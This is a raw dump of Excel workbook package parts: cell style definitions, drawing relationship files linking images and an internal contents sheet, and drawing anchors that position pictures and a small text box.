    <xf numFmtId="0" fontId="4" fillId="2" borderId="5" xfId="3" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="6" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="5" xfId="3" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="85" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="51" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="36" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="55" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="36" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="51" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="66" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="top"/>
    </xf>
  </cellXfs>
  <cellStyles count="4">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规 2" xfId="3"/>
    <cellStyle name="常规 3" xfId="2"/>
    <cellStyle name="超链接"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calcChain" Target="calcChain.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118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet118.xml"/><Relationship Id="rId12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pivotCacheDefinition" Target="pivotCache/pivotCacheDefinition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61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet61.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet82.xml"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing2.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3.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4.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5.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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><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7.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8.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9.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10.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11.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12.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13.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14.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15.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16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing17.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18.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19.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20.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21.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22.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23.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24.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25.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26.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27.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28.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29.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30.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31.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32.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33.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34.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35.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36.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37.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38.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39.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40.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41.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42.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43.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44.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45.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46.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47.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48.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49.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50.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:;" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.gif"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing51.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52.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53.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54.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55.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56.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57.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58.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59.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60.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61.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62.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63.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64.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65.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66.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67.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.jpeg"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing68.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69.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70.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71.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hyperlink" Target="#contents!A1"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.jpeg"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing72.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73.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74.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75.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76.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77.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.emf"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing78.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79.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80.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81.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.jpeg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.jpeg"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing83.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84.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85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing86.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87.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88.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89.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90.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92.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93.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94.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing95.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96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing98.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing99.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing100.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing101.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing102.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing103.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing104.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.gif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#contents!A1"/></Relationships>
</file>

<file path=xl/drawings/_rels/drawing105.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106.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107.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108.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_rels/drawing109.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s!A1"/></Relationships>
</file>

<file path=xl/drawings/drawing1.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>8001000</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>27</xdr:row>
      <xdr:rowOff>129540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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>8001000</xdr:colOff>
      <xdr:row>88</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>116</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="图片 2" descr="01.gif">
          <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>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twoCellAnchor>
    <xdr:from>
      <xdr:col>5</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>81</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>76200</xdr:colOff>
      <xdr:row>82</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="4" name="TextBox 3"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7741920" y="14996160"/>
          <a:ext cx="685800" cy="2133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N" sz="1100"/>
            <a:t>backup:</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>8001000</xdr:colOff>
      <xdr:row>76</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>116</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="5" name="图片 4" descr="01.gif">
          <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4953000</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6625859</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>175260</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3"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5242560" y="13228320"/>
          <a:ext cx="1672859" cy="1181100"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>6705600</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>8477649</xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="4"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6995160" y="13174980"/>
          <a:ext cx="1772049" cy="1516380"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>114300</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4937760</xdr:colOff>
      <xdr:row>27</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="5" name="Picture 9"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId5" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="114300" y="13723620"/>
          <a:ext cx="5113020" cy="2506980"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>30480</xdr:colOff>
      <xdr:row>28</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4853940</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>99060</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="6" name="Picture 11"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId6" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="30480" y="16245840"/>
          <a:ext cx="5113020" cy="1013460"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>53340</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4191000</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2050" name="Picture 2"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId7" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="53340" y="563880"/>
          <a:ext cx="4427220" cy="1203960"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>739140</xdr:colOff>
      <xdr:row>34</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3215640</xdr:colOff>
      <xdr:row>46</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2054" name="Picture 6"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId8" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="1028700" y="6431280"/>
          <a:ext cx="2476500" cy="2209800"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>251460</xdr:colOff>
      <xdr:row>47</xdr:row>
      <xdr:rowOff>7620</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5029200</xdr:colOff>
      <xdr:row>63</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2056" name="Picture 8"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId9" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="251460" y="8801100"/>
          <a:ext cx="5067300" cy="2956560"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>236220</xdr:colOff>
      <xdr:row>66</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3954780</xdr:colOff>
      <xdr:row>73</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2058"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525780" y="12359640"/>
          <a:ext cx="3718560" cy="1242060"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>74</xdr:row>
      <xdr:rowOff>68580</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3832860</xdr:colOff>
      <xdr:row>84</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2060" name="Picture 12"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId11" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="213360" y="13799820"/>
          <a:ext cx="3909060" cy="1805940"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>84</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5113020</xdr:colOff>
      <xdr:row>89</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2062" name="Picture 14"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId12" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="289560" y="15651480"/>
          <a:ext cx="5113020" cy="899160"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>90</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
